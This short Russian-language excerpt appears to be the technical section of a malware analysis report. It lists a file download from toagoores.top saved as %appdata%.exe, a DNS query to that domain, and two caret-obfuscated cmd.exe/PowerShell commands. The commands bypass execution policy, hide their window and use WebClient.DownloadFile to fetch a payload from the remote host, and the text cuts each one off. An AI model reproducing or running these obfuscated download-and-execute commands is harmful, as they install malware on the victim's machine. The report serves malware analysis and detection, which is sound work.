Техническая информация
- http://toagoores.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POw^ErSHEll.ex^E^ -ExecUt^i^O^NpO^L^Icy^ by^paS^S ^-NoPRoF^ILE^ ^-^wIND^O^w^S^t^yl^E hiDd^en (nEw-^Ob^JEC^t ^syst^em.NE^t.^weBcLieN^t^).D^O^W^n^loa^Dfi^L^E^(^'http://toagoores.to...
- DNS ASK to###ores.top
- '<SYSTEM32>\cmd.exe' /C "POw^ErSHEll.ex^E^ -ExecUt^i^O^NpO^L^Icy^ by^paS^S ^-NoPRoF^ILE^ ^-^wIND^O^w^S^t^yl^E hiDd^en (nEw-^Ob^JEC^t ^syst^em.NE^t.^weBcLieN^t^).D^O^W^n^loa^Dfi^L^E^(^'http://toagoores.to...' (со скрытым окном)